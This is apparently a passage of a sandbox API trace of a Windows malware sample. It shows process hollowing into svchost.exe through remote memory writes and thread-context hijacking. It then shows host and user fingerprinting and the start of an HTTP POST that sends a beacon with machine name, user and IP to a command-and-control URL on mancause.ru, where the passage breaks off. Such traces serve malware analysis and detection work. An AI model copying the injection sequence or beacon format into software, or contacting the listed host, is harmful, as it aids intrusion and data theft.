lpCommandLine="C:\\Windows\\System32\\svchost.exe", lpProcessInformation=0x14fcb8*(hProcess=0x32c, hThread=0x324, dwProcessId=0xf74, dwThreadId=0xf78)) returned 1 [0218.903] VirtualAllocEx (hProcess=0x32c, lpAddress=0x400000, dwSize=0x48000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0218.905] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x48000) returned 0x29d0048 [0218.911] WriteProcessMemory (in: hProcess=0x32c, lpBaseAddress=0x400000, lpBuffer=0x29d0048*, nSize=0x48000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x29d0048*, lpNumberOfBytesWritten=0x0) returned 1 [0218.923] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x29d0048 | out: hHeap=0x5d0000) returned 1 [0218.923] GetThreadContext (in: hThread=0x324, lpContext=0x14f9f4 | out: lpContext=0x14f9f4*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0xf22104, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0218.924] WriteProcessMemory (in: hProcess=0x32c, lpBaseAddress=0x7efde008, lpBuffer=0x14fcd0*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14fcd0*, lpNumberOfBytesWritten=0x0) returned 1 [0218.927] SetThreadContext (hThread=0x324, lpContext=0x14f9f4*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401480, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0218.927] ResumeThread (hThread=0x324) returned 0x1 [0218.927] GetProcessId (Process=0x32c) returned 0xf74 [0218.927] CloseHandle (hObject=0x324) returned 1 [0218.928] CloseHandle (hObject=0x32c) returned 1 [0218.928] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2bd0020 | out: hHeap=0x5d0000) returned 1 [0218.930] Sleep (dwMilliseconds=0xea60) [0229.041] Sleep (dwMilliseconds=0xea60) [0239.073] GetVersion () returned 0x1db10106 [0239.073] GetComputerNameA (in: lpBuffer=0x14e2c0, nSize=0x14e3c4 | out: lpBuffer="Q9IATRKPRH", nSize=0x14e3c4) returned 1 [0239.073] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0239.073] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0239.073] K32EnumProcesses (in: lpidProcess=0x14ce80, cb=0x1000, lpcbNeeded=0x14df88 | out: lpidProcess=0x14ce80, lpcbNeeded=0x14df88) returned 1 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0239.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0239.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c0) returned 0x0 [0239.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0239.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0239.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0239.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x32c [0239.083] K32GetProcessImageFileNameA (in: hProcess=0x32c, lpImageFileName=0x14cd5c, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0239.083] CloseHandle (hObject=0x32c) returned 1 [0239.084] lstrcpyA (in: lpString1=0x14de80, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0239.084] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0239.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x32c [0239.084] OpenProcessToken (in: ProcessHandle=0x32c, DesiredAccess=0x20008, TokenHandle=0x14df74 | out: TokenHandle=0x14df74*=0x324) returned 1 [0239.084] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14df7c | out: TokenInformation=0x0, ReturnLength=0x14df7c) returned 0 [0239.084] GetLastError () returned 0x7a [0239.084] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x656510 [0239.085] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x1, TokenInformation=0x656510, TokenInformationLength=0x24, ReturnLength=0x14df7c | out: TokenInformation=0x656510, ReturnLength=0x14df7c) returned 1 [0239.085] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x656518*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x14df9c, cchName=0x14df90, ReferencedDomainName=0x14e0a0, cchReferencedDomainName=0x14df98, peUse=0x14df64 | out: Name="kEecfMwgj", cchName=0x14df90, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x14df98, peUse=0x14df64) returned 1 [0239.094] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x656510 | out: hHeap=0x5d0000) returned 1 [0239.094] lstrcpyA (in: lpString1=0x14e1bc, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0239.094] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0239.094] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0239.094] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0239.094] lstrcpyA (in: lpString1=0x14fcd4, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0239.094] DsEnumerateDomainTrustsA () returned 0x6b5 [0239.099] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77350000 [0239.099] GetProcAddress (hModule=0x77350000, lpProcName="GetNativeSystemInfo") returned 0x773710b5 [0239.099] GetNativeSystemInfo (in: lpSystemInfo=0x14e3a0 | out: lpSystemInfo=0x14e3a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0239.100] wsprintfA (in: param_1=0x14e3d4, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0239.100] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0239.100] lstrlenA (lpString="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0239.100] InternetCrackUrlA (in: lpszUrl="http://mancause.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14e34c | out: lpUrlComponents=0x14e34c) returned 1 [0239.100] InternetConnectA (hInternet=0xcc0004, lpszServerName="mancause.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0239.103] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0239.103] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: 